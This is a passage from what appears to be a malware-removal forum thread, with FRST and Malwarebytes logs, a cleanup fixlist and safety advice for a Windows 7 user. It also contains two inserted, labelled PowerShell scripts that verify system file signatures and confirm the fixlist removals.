2014-10-23 20:30 - 2014-10-23 20:30 - 00000000 ____D () C:\windows\system32\vbox
2014-10-23 20:25 - 2014-10-24 19:54 - 00000000 ____D () C:\ProgramData\AVAST Software
2014-10-23 12:36 - 2014-10-23 21:10 - 00000000 ____D () C:\Users\Jude\AppData\Local\CrashDumps
2014-10-22 23:38 - 2014-10-22 23:38 - 00000000 ____D () C:\ProgramData\Sun
2014-10-22 23:37 - 2014-10-22 23:37 - 00000000 ____D () C:\ProgramData\Oracle
2014-10-22 23:07 - 2014-10-22 23:08 - 00002441 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader XI.lnk
2014-10-22 23:07 - 2014-10-22 23:07 - 00001989 _____ () C:\Users\Public\Desktop\Adobe Reader XI.lnk
2014-10-22 23:07 - 2014-10-22 23:07 - 00000000 ____D () C:\Program Files\Adobe
2014-10-20 20:22 - 2014-10-24 20:39 - 00034808 _____ () C:\windows\system32\Drivers\TrueSight.sys
2014-10-20 20:22 - 2014-10-20 20:22 - 00000000 ____D () C:\ProgramData\RogueKiller
2014-10-20 20:13 - 2014-10-20 21:55 - 00000000 ____D () C:\windows\erdnt
2014-10-19 09:45 - 2014-10-28 17:40 - 00114904 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-19 09:35 - 2014-10-22 07:05 - 00001060 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-10-19 09:35 - 2014-10-22 07:05 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-19 09:34 - 2014-10-22 07:05 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-10-19 09:34 - 2014-10-01 11:11 - 00075480 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mbamchameleon.sys
2014-10-19 09:34 - 2014-10-01 11:11 - 00051928 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mwac.sys
2014-10-16 06:01 - 2014-09-28 19:41 - 02379264 _____ (Microsoft Corporation) C:\windows\system32\win32k.sys
2014-10-16 06:01 - 2014-06-18 17:23 - 01131664 _____ (Microsoft Corporation) C:\windows\system32\dfshim.dll
2014-10-16 06:01 - 2014-06-18 17:23 - 00156824 _____ (Microsoft Corporation) C:\windows\system32\mscorier.dll
2014-10-16 06:01 - 2014-06-18 17:23 - 00081560 _____ (Microsoft Corporation) C:\windows\system32\mscories.dll
2014-10-16 06:00 - 2014-10-06 21:04 - 00331448 _____ (Microsoft Corporation) C:\windows\system32\iedkcs32.dll
2014-10-16 06:00 - 2014-09-25 17:46 - 00365056 _____ (Microsoft Corporation) C:\windows\system32\dxtmsft.dll
2014-10-16 06:00 - 2014-09-25 17:46 - 00243200 _____ (Microsoft Corporation) C:\windows\system32\dxtrans.dll
2014-10-16 06:00 - 2014-09-25 17:46 - 00069632 _____ (Microsoft Corporation) C:\windows\system32\mshtmled.dll
2014-10-16 06:00 - 2014-09-25 17:43 - 11807232 _____ (Microsoft Corporation) C:\windows\system32\ieframe.dll
2014-10-16 06:00 - 2014-09-25 17:32 - 02017280 _____ (Microsoft Corporation) C:\windows\system32\inetcpl.cpl
2014-10-16 06:00 - 2014-09-18 20:44 - 17484800 _____ (Microsoft Corporation) C:\windows\system32\mshtml.dll
2014-10-16 06:00 - 2014-09-18 20:25 - 04201472 _____ (Microsoft Corporation) C:\windows\system32\jscript9.dll
2014-10-16 06:00 - 2014-09-18 20:14 - 02724864 _____ (Microsoft Corporation) C:\windows\system32\mshtml.tlb
2014-10-16 06:00 - 2014-09-18 20:14 - 00004096 _____ (Microsoft Corporation) C:\windows\system32\ieetwcollectorres.dll
2014-10-16 06:00 - 2014-09-18 20:02 - 00454656 _____ (Microsoft Corporation) C:\windows\system32\vbscript.dll
2014-10-16 06:00 - 2014-09-18 20:01 - 00061952 _____ (Microsoft Corporation) C:\windows\system32\iesetup.dll
2014-10-16 06:00 - 2014-09-18 20:01 - 00051200 _____ (Microsoft Corporation) C:\windows\system32\ieetwproxystub.dll
2014-10-16 06:00 - 2014-09-18 19:59 - 00061952 _____ (Microsoft Corporation) C:\windows\system32\MshtmlDac.dll
2014-10-16 06:00 - 2014-09-18 19:55 - 02187264 _____ (Microsoft Corporation) C:\windows\system32\iertutil.dll
2014-10-16 06:00 - 2014-09-18 19:54 - 00043008 _____ (Microsoft Corporation) C:\windows\system32\jsproxy.dll
2014-10-16 06:00 - 2014-09-18 19:53 - 00032768 _____ (Microsoft Corporation) C:\windows\system32\iernonce.dll
2014-10-16 06:00 - 2014-09-18 19:51 - 00440320 _____ (Microsoft Corporation) C:\windows\system32\ieui.dll
2014-10-16 06:00 - 2014-09-18 19:50 - 00112128 _____ (Microsoft Corporation) C:\windows\system32\ieUnatt.exe
2014-10-16 06:00 - 2014-09-18 19:50 - 00108032 _____ (Microsoft Corporation) C:\windows\system32\ieetwcollector.exe
2014-10-16 06:00 - 2014-09-18 19:49 - 00597504 _____ (Microsoft Corporation) C:\windows\system32\jscript9diag.dll
2014-10-16 06:00 - 2014-09-18 19:44 - 00646144 _____ (Microsoft Corporation) C:\windows\system32\MsSpellCheckingFacility.exe
2014-10-16 06:00 - 2014-09-18 19:36 - 00060416 _____ (Microsoft Corporation) C:\windows\system32\JavaScriptCollectionAgent.dll
2014-10-16 06:00 - 2014-09-18 19:32 - 00164864 _____ (Microsoft Corporation) C:\windows\system32\msrating.dll
2014-10-16 06:00 - 2014-09-18 19:20 - 00677888 _____ (Microsoft Corporation) C:\windows\system32\ie4uinit.exe
2014-10-16 06:00 - 2014-09-18 19:20 - 00607744 _____ (Microsoft Corporation) C:\windows\system32\msfeeds.dll
2014-10-16 06:00 - 2014-09-18 19:18 - 01068032 _____ (Microsoft Corporation) C:\windows\system32\mshtmlmedia.dll
2014-10-16 06:00 - 2014-09-18 18:59 - 01810944 _____ (Microsoft Corporation) C:\windows\system32\wininet.dll
2014-10-16 06:00 - 2014-09-18 18:53 - 01190400 _____ (Microsoft Corporation) C:\windows\system32\urlmon.dll
2014-10-16 06:00 - 2014-09-18 18:52 - 00678400 _____ (Microsoft Corporation) C:\windows\system32\ieapfltr.dll
2014-10-16 06:00 - 2014-09-04 00:04 - 00372736 _____ (Microsoft Corporation) C:\windows\system32\rastls.dll
2014-10-16 05:59 - 2014-09-12 20:40 - 00067072 _____ (Microsoft Corporation) C:\windows\system32\packager.dll
2014-10-16 05:59 - 2014-08-28 20:44 - 02744320 _____ (Microsoft Corporation) C:\windows\system32\rdpcorets.dll
2014-10-16 05:59 - 2014-07-16 20:40 - 00157696 _____ (Microsoft Corporation) C:\windows\system32\winsta.dll
2014-10-16 05:59 - 2014-07-16 20:39 - 00523264 _____ (Microsoft Corporation) C:\windows\system32\termsrv.dll
2014-10-16 05:59 - 2014-07-16 20:39 - 00304128 _____ (Microsoft Corporation) C:\windows\system32\winlogon.exe
2014-10-16 05:59 - 2014-07-16 20:39 - 00130048 _____ (Microsoft Corporation) C:\windows\system32\rdpcorekmts.dll
2014-10-16 05:59 - 2014-07-16 20:39 - 00065536 _____ (Microsoft Corporation) C:\windows\system32\TSpkg.dll
2014-10-16 05:59 - 2014-07-16 20:39 - 00017408 _____ (Microsoft Corporation) C:\windows\system32\credssp.dll
2014-10-16 05:59 - 2014-07-16 20:03 - 00184320 _____ (Microsoft Corporation) C:\windows\system32\Drivers\rdpwd.sys
2014-10-16 05:59 - 2014-07-16 20:02 - 00031232 _____ (Microsoft Corporation) C:\windows\system32\Drivers\tssecsrv.sys
2014-10-16 05:58 - 2014-08-29 20:50 - 05702656 _____ (Microsoft Corporation) C:\windows\system32\mstscax.dll
2014-09-30 05:40 - 2014-09-30 05:40 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Citrix

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-28 17:44 - 2012-08-25 09:04 - 00001844 _____ () C:\Users\Public\Desktop\McAfee Internet Security.lnk
2014-10-28 17:39 - 2010-05-07 23:24 - 01134306 _____ () C:\windows\PFRO.log
2014-10-28 17:39 - 2010-05-07 22:53 - 01826244 _____ () C:\windows\WindowsUpdate.log
2014-10-28 17:39 - 2009-07-13 23:53 - 00000006 ____H () C:\windows\Tasks\SA.DAT
2014-10-28 17:39 - 2009-07-13 23:39 - 00335011 _____ () C:\windows\setupact.log
2014-10-28 17:38 - 2010-08-13 15:58 - 00000000 ____D () C:\Users\Jude
2014-10-28 17:38 - 2000-10-29 17:31 - 00407624 _____ () C:\Users\Jude\Documents\Grandpa Frank's picture.eml
2014-10-28 17:34 - 2009-07-13 23:34 - 00014240 ____H () C:\windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-10-28 17:34 - 2009-07-13 23:34 - 00014240 ____H () C:\windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-10-27 05:34 - 2014-07-05 15:34 - 328273831 _____ () C:\windows\MEMORY.DMP
2014-10-27 05:34 - 2014-07-05 15:34 - 00000000 ____D () C:\windows\Minidump
2014-10-26 19:30 - 2012-02-12 13:38 - 00000000 ____D () C:\Program Files\LTCM Client
2014-10-23 22:17 - 2010-08-14 11:20 - 00000000 ____D () C:\Users\Jude\AppData\Roaming\Skype
2014-10-23 20:13 - 2010-08-13 15:58 - 00000000 ____D () C:\Users\Jude\AppData\Local\VirtualStore
2014-10-22 23:18 - 2013-08-03 08:13 - 00701104 _____ (Adobe Systems Incorporated) C:\windows\system32\FlashPlayerApp.exe
2014-10-22 23:18 - 2011-07-30 12:21 - 00071344 _____ (Adobe Systems Incorporated) C:\windows\system32\FlashPlayerCPLApp.cpl
2014-10-22 23:17 - 2010-08-29 13:04 - 00000000 ____D () C:\Users\Jude\AppData\Local\Adobe
2014-10-22 23:08 - 2011-07-30 12:19 - 00000000 ____D () C:\Program Files\Common Files\Adobe
2014-10-22 23:07 - 2010-08-29 13:05 - 00000000 ____D () C:\ProgramData\Adobe
2014-10-20 18:56 - 2009-07-13 21:37 - 00000000 ____D () C:\windows\rescache
2014-10-19 09:35 - 2010-08-29 13:23 - 00000000 ____D () C:\Users\Jude\AppData\Roaming\Malwarebytes
2014-10-19 09:34 - 2010-08-29 13:23 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-10-16 16:07 - 2009-07-13 21:37 - 00000000 ____D () C:\windows\Microsoft.NET
2014-10-16 09:16 - 2009-07-13 23:33 - 00408160 _____ () C:\windows\system32\FNTCACHE.DAT
2014-10-16 09:08 - 2013-08-03 08:26 - 00000000 ____D () C:\windows\system32\MRT
2014-10-16 09:01 - 2010-12-25 17:37 - 100290944 _____ (Microsoft Corporation) C:\windows\system32\MRT.exe
2014-10-06 11:15 - 2009-07-13 21:37 - 00000000 ____D () C:\windows\system32\NDF
2014-10-01 11:11 - 2013-11-30 09:46 - 00023256 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mbam.sys
2014-09-29 07:47 - 2009-07-13 23:53 - 00032632 _____ () C:\windows\Tasks\SCHEDLGU.TXT

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\windows\explorer.exe => File is digitally signed
C:\windows\system32\winlogon.exe => File is digitally signed
C:\windows\system32\wininit.exe => File is digitally signed
C:\windows\system32\svchost.exe => File is digitally signed
C:\windows\system32\services.exe => File is digitally signed
C:\windows\system32\User32.dll => File is digitally signed
C:\windows\system32\userinit.exe => File is digitally signed
C:\windows\system32\rpcss.dll => File is digitally signed
C:\windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2014-10-27 16:32

==================== End Of Log ============================

 

Please review this and let me know if any further action is required.

 

Thank you,

 

John


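Two of the checks in the FRST log above are worth being able to repeat without the tool: the "Bamital & volsnap Check" (are the core logon and boot binaries still Microsoft-signed, or has something patched them in place) and the "[X]" marker on esgiguard (a service or driver entry whose ImagePath points at a file that no longer exists, which is what an uninstalled or half-removed product leaves behind). The following PowerShell script is an added example, not code from the thread, from FRST or from BleepingComputer. It assumes an elevated PowerShell prompt on the affected machine; the list of core files is the same one FRST checks, taken from the log.

```powershell
# Added example, not code from the thread or from FRST. Reproduces two checks FRST made:
#  1. "Bamital & volsnap Check": are the core boot/logon binaries validly Microsoft-signed?
#  2. the "[X]" flag on esgiguard: service/driver entries whose ImagePath no longer exists.
# Assumptions: run elevated. On older PowerShell (including the 2.0 that ships with the
# Windows 7 machine in this thread) Get-AuthenticodeSignature only sees embedded signatures,
# and many of these files are catalog-signed, so NotSigned there is not proof of tampering;
# cross-check such a file with "sfc /verifyfile=<path>" before acting on it.

$coreFiles = @(
    "$env:windir\explorer.exe",
    "$env:windir\system32\winlogon.exe",
    "$env:windir\system32\wininit.exe",
    "$env:windir\system32\svchost.exe",
    "$env:windir\system32\services.exe",
    "$env:windir\system32\user32.dll",
    "$env:windir\system32\userinit.exe",
    "$env:windir\system32\rpcss.dll",
    "$env:windir\system32\drivers\volsnap.sys"
)

function Test-CoreFileSignature([string[]]$files) {
    foreach ($f in $files) {
        if (-not (Test-Path -LiteralPath $f)) {
            New-Object PSObject -Property @{ File = $f; Status = 'MISSING'; Signer = ''; Flag = 'CHECK' }
            continue
        }
        $sig    = Get-AuthenticodeSignature -FilePath $f
        $signer = ''
        if ($sig.SignerCertificate) { $signer = $sig.SignerCertificate.Subject }
        # Anything other than a Valid signature from Microsoft deserves a second look. A file
        # patched in place (the Bamital technique) fails with HashMismatch because the bytes
        # no longer match the signed hash.
        $suspicious = ($sig.Status -ne 'Valid') -or ($signer -notmatch 'O=Microsoft Corporation')
        $flag = 'ok'
        if ($suspicious) { $flag = 'CHECK' }
        New-Object PSObject -Property @{ File = $f; Status = $sig.Status; Signer = $signer; Flag = $flag }
    }
}

function Get-OrphanedServiceBinary {
    # Mirrors FRST's "[X]" marker: a service or driver whose ImagePath points nowhere.
    $root = 'HKLM:\SYSTEM\CurrentControlSet\Services'
    foreach ($svc in Get-ChildItem $root -ErrorAction SilentlyContinue) {
        $img = (Get-ItemProperty -Path $svc.PSPath -ErrorAction SilentlyContinue).ImagePath
        if (-not $img) { continue }
        # Normalise the forms seen in the FRST log: \??\C:\..., \SystemRoot\..., a bare
        # system32\DRIVERS\x.sys, "quoted path" plus arguments, and %SystemRoot% variables.
        $p = [Environment]::ExpandEnvironmentVariables($img).Trim()
        $p = $p -replace '^\\\?\?\\', '' -replace '^\\SystemRoot\\', "$env:windir\"
        if ($p.StartsWith('"')) {
            $end = $p.IndexOf('"', 1)
            if ($end -gt 1) { $p = $p.Substring(1, $end - 1) }
        } else {
            $p = ($p -split ' -| /')[0]   # heuristic: drop "svchost.exe -k ..." style switches
        }
        if ($p -notmatch '^[A-Za-z]:\\') { $p = Join-Path $env:windir $p }
        if (-not (Test-Path -LiteralPath $p)) {
            New-Object PSObject -Property @{ Service = $svc.PSChildName; ImagePath = $img; Resolved = $p }
        }
    }
}

Test-CoreFileSignature $coreFiles | Select-Object File, Status, Signer, Flag | Format-Table -AutoSize
Get-OrphanedServiceBinary | Select-Object Service, ImagePath, Resolved | Format-Table -AutoSize
```

On the machine in this thread the second function should list esgiguard (the SpyHunter driver with its file already gone); an orphaned entry is not malicious by itself, but it is exactly the kind of leftover the fixlist in the next reply removes, and any orphan you cannot attribute to a product you uninstalled yourself deserves a closer look.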

#10 Gunto

    Bleepin' Reject Phoenix

  • Malware Response Team
  • 1,291 posts
  • Gender:Female
  • Location:North Las Vegas, Nevada, USA

Posted 29 October 2014 - 10:06 AM

Hi,

 

Very good! I still see a few things in your log to take care of, but assuming you're not having any problems, we're getting close to being done!

 

Farbar Recovery Scan Tool

I need you to run a fix with FRST.

  • Open up Notepad, and copy and paste the text in the following box into the Notepad text field:
    HKLM\...\Policies\Explorer: [NoFolderOptions] 0
    HKLM\...\Policies\Explorer: [NoControlPanel] 0
    HKU\S-1-5-18\...\RunOnce: [WLStart] => C:\Program Files\Windows Live\Installer\wlstart.exe [768336 2009-07-26] (Microsoft Corporation)
    ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  No File
    HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.twcc.com/
    S3 esgiguard; \??\C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys [X]
    C:\windows\system32\2014-10-25-00-14-23.060-AvastVBoxSVC.exe-6096.log
    C:\windows\system32\2014-10-24-03-23-19.088-aswFe.exe-2368.log
    C:\Program Files\Enigma Software Group
    C:\windows\455F074C814E4520B69B5584BD90400C.TMP
    C:\Program Files\Common Files\Wise Installation Wizard
    C:\windows\system32\2014-10-24-02-06-00.040-AvastVBoxSVC.exe-9492.log
    C:\windows\system32\vbox
    C:\ProgramData\AVAST Software
    C:\ProgramData\Sun
    C:\ProgramData\Oracle
  • Save it to the same location as FRST as fixlist.txt.
  • Open up FRST, and click the Fix button. If it asks you to reboot in order to complete the fix, please do so.
  • Once it's done fixing things, it will create Fixlog.txt in the same folder. Please copy and paste it into your reply.

Malwarebytes

Next, to make sure there aren't any leftovers hiding, I need you to run a scan with Malwarebytes Anti-Malware.

  • Double click the MBAM shortcut on your desktop to open MBAM.
  • Click Update Now >>, and check for updates. If a new version of MBAM is included in the update, follow the prompts and install it.
  • Once the program is done updating, click Scan at the top of the main interface. Then tick the Custom Scan option, and hit the Scan Now >> button. On this screen, make sure every box is checked, then start the scan. If there is a program update available, allow MBAM to update.
  • Once the scan is finished, click Apply Actions to any found malware. If MBAM asks you to reboot, do so immediately.
  • When done, retrieve the log by clicking History on the main interface, then Application logs. View the log of the scan you just ran, then click the Copy to Clipboard button, and paste it into your reply.

Finally, please let me know how your computer is running.

 

Gunto


Beautiful avatar by Plumbeck!

 

Bury me in honor; when I'm dead and hit the ground, a love back home, it unfolds...

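Gunto's fixlist mixes several entry kinds: registry values that FRST deletes (the Explorer policy restrictions NoFolderOptions and NoControlPanel, and a RunOnce entry), a shell overlay key, a start page that FRST resets, a service entry and a list of files and folders to be moved. The Fixlog in the next reply reports success for each, but "deleted" in a log is worth confirming against the live machine, not least because malware that keeps re-setting a policy will show up as the value being back. The following PowerShell script is an added example, not code from Gunto, from FRST or from BleepingComputer: it parses the fixlist as posted and checks, entry by entry, whether the item is actually gone. It assumes an elevated PowerShell prompt on the affected machine; the expansion of FRST's "HK*\...\" shorthand to "HK*\Software\Microsoft\Windows\CurrentVersion\" is taken from the Fixlog itself, and the fixlist text below is a constructed copy of the one in this post.

```powershell
# Added example, not code from the thread or from FRST: re-check every fixlist entry after
# FRST has run, so that the Fixlog's "deleted successfully" is confirmed on the live system.
# Assumptions: elevated PowerShell 2.0 or later on the affected machine. The "...\" shorthand
# expansion below follows the Fixlog (HKLM\...\Policies\Explorer became
# HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer).

# Constructed copy of the fixlist Gunto posted.
$fixlist = @'
HKLM\...\Policies\Explorer: [NoFolderOptions] 0
HKLM\...\Policies\Explorer: [NoControlPanel] 0
HKU\S-1-5-18\...\RunOnce: [WLStart] => C:\Program Files\Windows Live\Installer\wlstart.exe [768336 2009-07-26] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  No File
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.twcc.com/
S3 esgiguard; \??\C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys [X]
C:\Program Files\Enigma Software Group
C:\windows\455F074C814E4520B69B5584BD90400C.TMP
'@ -split "`r?`n"

function ConvertTo-PSRegistryPath([string]$key) {
    # FRST writes HK*\...\ for HK*\Software\Microsoft\Windows\CurrentVersion\ and uses
    # HKU\<SID> for a specific user hive (S-1-5-18 is the SYSTEM account).
    $key = $key -replace '\\\.\.\.\\', '\Software\Microsoft\Windows\CurrentVersion\'
    if ($key -like 'HKU\*' -and -not (Test-Path 'HKU:\')) {
        New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS | Out-Null
    }
    return ($key -replace '^(HKLM|HKCU|HKU)\\', '$1:\')
}

function Test-RegistryValueGone([string]$key, [string]$name) {
    $path = ConvertTo-PSRegistryPath $key
    if (-not (Test-Path $path)) { return $true }
    $item = Get-ItemProperty -Path $path -ErrorAction SilentlyContinue
    return ($item -eq $null) -or ($item.PSObject.Properties[$name] -eq $null)
}

function Test-FixlistEntry([string]$line) {
    $line = $line.Trim()
    if ($line -eq '') { return }
    $ok = $null; $what = ''
    switch -regex ($line) {
        # "HKLM\...\Policies\Explorer: [NoFolderOptions] 0"  or  "HKU\...\RunOnce: [WLStart] => path"
        '^(HK[A-Z0-9\\\-\.]+): \[([^\]]+)\]\s*(.*)$' {
            $what = "value $($matches[2]) under $($matches[1])"
            $ok = Test-RegistryValueGone $matches[1] $matches[2]
            # A policy value that still exists but holds 0 is harmless; "[NoFolderOptions] 0"
            # asks for exactly that state.
            if (-not $ok -and $matches[3] -eq '0') {
                $ok = ((Get-ItemProperty -Path (ConvertTo-PSRegistryPath $matches[1])).$($matches[2]) -eq 0)
            }
            break
        }
        '^ShellIconOverlayIdentifiers: \[([^\]]+)\]' {
            $k = "HKLM:\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\$($matches[1])"
            $what = "overlay handler $($matches[1])"
            $ok = -not (Test-Path $k)
            break
        }
        '^(HKCU\\[^,]+),Start Page = (\S+)' {
            $cur = (Get-ItemProperty -Path (ConvertTo-PSRegistryPath $matches[1]) -ErrorAction SilentlyContinue).'Start Page'
            $what = "IE start page (now '$cur')"
            $ok = ($cur -ne $matches[2])     # FRST restores the default; the flagged URL must be gone
            break
        }
        '^[RSU]\d+ ([^;]+);' {
            $what = "service/driver $($matches[1])"
            $ok = -not (Test-Path "HKLM:\SYSTEM\CurrentControlSet\Services\$($matches[1])")
            break
        }
        '^[A-Za-z]:\\' {
            $what = "path $line"
            $ok = -not (Test-Path -LiteralPath $line)
            break
        }
        default { $what = "unrecognised entry: $line" }
    }
    New-Object PSObject -Property @{ Entry = $what; Gone = $ok }
}

$results = $fixlist | ForEach-Object { Test-FixlistEntry $_ }
$results | Select-Object Entry, Gone | Format-Table -AutoSize
if ($results | Where-Object { $_.Gone -eq $false }) {
    Write-Warning 'Some fixlist items are still present: re-run FRST, and find out what recreated them.'
}
```

Run it once before the fix to see every entry reported as still present, and once after the reboot; an entry that comes back between the two runs (a policy value in particular) means something still running is re-applying it, which is the signal to go back to a fresh FRST log rather than to declare the machine clean.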

#11 sysadmin74

  • Topic Starter
  • Members
  • 21 posts

Posted 29 October 2014 - 11:06 AM

Thank you for the update.  I'll run the recommended scans sometime later tonight.  As for my PC's performance, it's been performing much better since Friday.  I no longer see multiple instances of dllhost.exe running and taking up a lot of memory.  Downloads have also been enabled in the security settings of IE and have not had to be re-enabled. 



#12 sysadmin74

  • Topic Starter
  • Members
  • 21 posts

Posted 29 October 2014 - 09:44 PM

Enclosed are the contents of the fixlog file:

 

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x86) Version: 26-10-2014
Ran by Jude at 2014-10-29 17:52:22 Run:2
Running from C:\Users\Jude\Desktop
Loaded Profile: Jude (Available profiles: Jude)
Boot Mode: Normal

==============================================

Content of fixlist:
*****************
HKLM\...\Policies\Explorer: [NoFolderOptions] 0
HKLM\...\Policies\Explorer: [NoControlPanel] 0
HKU\S-1-5-18\...\RunOnce: [WLStart] => C:\Program Files\Windows Live\Installer\wlstart.exe [768336 2009-07-26] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  No File
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.twcc.com/
S3 esgiguard; \??\C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys [X]
C:\windows\system32\2014-10-25-00-14-23.060-AvastVBoxSVC.exe-6096.log
C:\windows\system32\2014-10-24-03-23-19.088-aswFe.exe-2368.log
C:\Program Files\Enigma Software Group
C:\windows\455F074C814E4520B69B5584BD90400C.TMP
C:\Program Files\Common Files\Wise Installation Wizard
C:\windows\system32\2014-10-24-02-06-00.040-AvastVBoxSVC.exe-9492.log
C:\windows\system32\vbox
C:\ProgramData\AVAST Software
C:\ProgramData\Sun
C:\ProgramData\Oracle
*****************

HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoFolderOptions => value deleted successfully.
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoControlPanel => value deleted successfully.
HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\RunOnce\\WLStart => value deleted successfully.
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\00avast" => Key deleted successfully.
"HKCR\CLSID\{472083B0-C522-11CF-8763-00608CC02F24}" => Key not found.
HKCU\Software\Microsoft\Internet Explorer\Main\\Start Page => Value was restored successfully.
esgiguard => Service deleted successfully.
C:\windows\system32\2014-10-25-00-14-23.060-AvastVBoxSVC.exe-6096.log => Moved successfully.
C:\windows\system32\2014-10-24-03-23-19.088-aswFe.exe-2368.log => Moved successfully.
C:\Program Files\Enigma Software Group => Moved successfully.
C:\windows\455F074C814E4520B69B5584BD90400C.TMP => Moved successfully.
C:\Program Files\Common Files\Wise Installation Wizard => Moved successfully.
C:\windows\system32\2014-10-24-02-06-00.040-AvastVBoxSVC.exe-9492.log => Moved successfully.
C:\windows\system32\vbox => Moved successfully.
C:\ProgramData\AVAST Software => Moved successfully.
C:\ProgramData\Sun => Moved successfully.
C:\ProgramData\Oracle => Moved successfully.

==== End of Fixlog ====

 

Enclosed are the contents of the Malwarebytes scan:

 

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 10/29/2014
Scan Time: 5:58:27 PM
Logfile:
Administrator: Yes

Version: 2.00.3.1025
Malware Database: v2014.10.29.08
Rootkit Database: v2014.10.22.01
License: Trial
Malware Protection: Enabled
Malicious Website Protection: Enabled
Self-protection: Disabled

OS: Windows 7 Service Pack 1
CPU: x86
File System: NTFS
User: Jude

Scan Type: Custom Scan
Result: Completed
Objects Scanned: 712448
Time Elapsed: 3 hr, 34 min, 51 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 0
(No malicious items detected)

Registry Values: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 0
(No malicious items detected)

Physical Sectors: 0
(No malicious items detected)

(end)

 

Thanks again and please let me know what further steps, if any, are recommended.



#13 Gunto

    Bleepin' Reject Phoenix

  • Malware Response Team
  • 1,291 posts
  • Gender:Female
  • Location:North Las Vegas, Nevada, USA

Posted 30 October 2014 - 10:24 AM

Hi,

 

Excellent! And with that...

 

Congrats, your computer looks free of malware! :woot:

However, we'll need to clean up the tools we used to make it that way.

  • Download DelFix from here, and save it to your desktop.
  • Double click the file to run it. On the main screen, make sure the following options are checked:
    Remove disinfection tools
    Purge system restore

    Click the Run button after ensuring the above options are selected.
  • Once the program is done running, a log will pop up. Please copy and paste it into your final reply.

Here are some steps to improve how your computer works, and to help keep you from getting infected again.

Keep all of your software updated. This is especially true for your antivirus. Keeping your software up-to-date is one of the most important steps to keeping malware out of your system. Old versions of many different programs have security vulnerabilities that malware targets to infect your system, whereas many of these would be fixed in updates. In addition to that, outdated definitions for your antivirus (and other security programs) may fail to detect newer malware that has since been added to the database. For new software version updates, I recommend FileHippo App Manager. However, FH doesn't find all updates, so be sure to manually check for updates as well.

Browse safely. Much of the time, malware gets in because the user isn't cautious. Examples of safe browsing include:

  • Don't open emails from people you don't know, especially if they have an attachment. Files (especially those with a .BAT, .COM, .EXE or .SCR extension) should never be trusted unless you know for a fact that you can trust the source. You should also be careful with these files even from friends, since their emails might actually be from bots using their addresses.
  • Don't install things that you don't trust. For example, some websites will ask you to install programs in order to use a certain functionality, especially supposed updates to programs such as Flash and Java. If your software is up-to-date, it's probably a fake.
  • In addition to the above, be careful even when installing programs that you recognize. Sometimes, programs will install other software when a user doesn't pay attention, so always make sure to decline offers for programs you don't want or recognize.

Happy surfing! :)

Gunto




#14 sysadmin74

  • Topic Starter
  • Members
  • 21 posts

Posted 31 October 2014 - 07:44 PM

Enclosed are the contents of the delfix file:

 

# DelFix v10.8 - Logfile created 31/10/2014 at 19:39:39
# Updated 29/07/2014 by Xplode
# Username : Jude - GERSTNER-PC
# Operating System : Windows 7 Home Premium Service Pack 1 (32 bits)

~ Removing disinfection tools ...

Deleted : C:\FRST
Deleted : C:\AdwCleaner
Deleted : C:\TDSSKiller.3.0.0.40_20.10.2014_19.37.30_log.txt
Deleted : C:\TDSSKiller.3.0.0.40_23.10.2014_20.59.48_log.txt
Deleted : C:\Users\Jude\Desktop\Fixlog.txt
Deleted : C:\Users\Jude\Downloads\RogueKiller.exe
Deleted : HKLM\SOFTWARE\AdwCleaner
Deleted : HKLM\SOFTWARE\Swearware
Deleted : HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\PEVSystemStart
Deleted : HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\procexp90.Sys
Deleted : HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PEVSystemStart
Deleted : HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\procexp90.Sys

~ Cleaning system restore ...

Deleted : RP #2630 [Installed SpyHunter | 10/24/2014 03:14:31]
Deleted : RP #2631 [Removed Sophos Virus Removal Tool. | 10/25/2014 00:11:54]
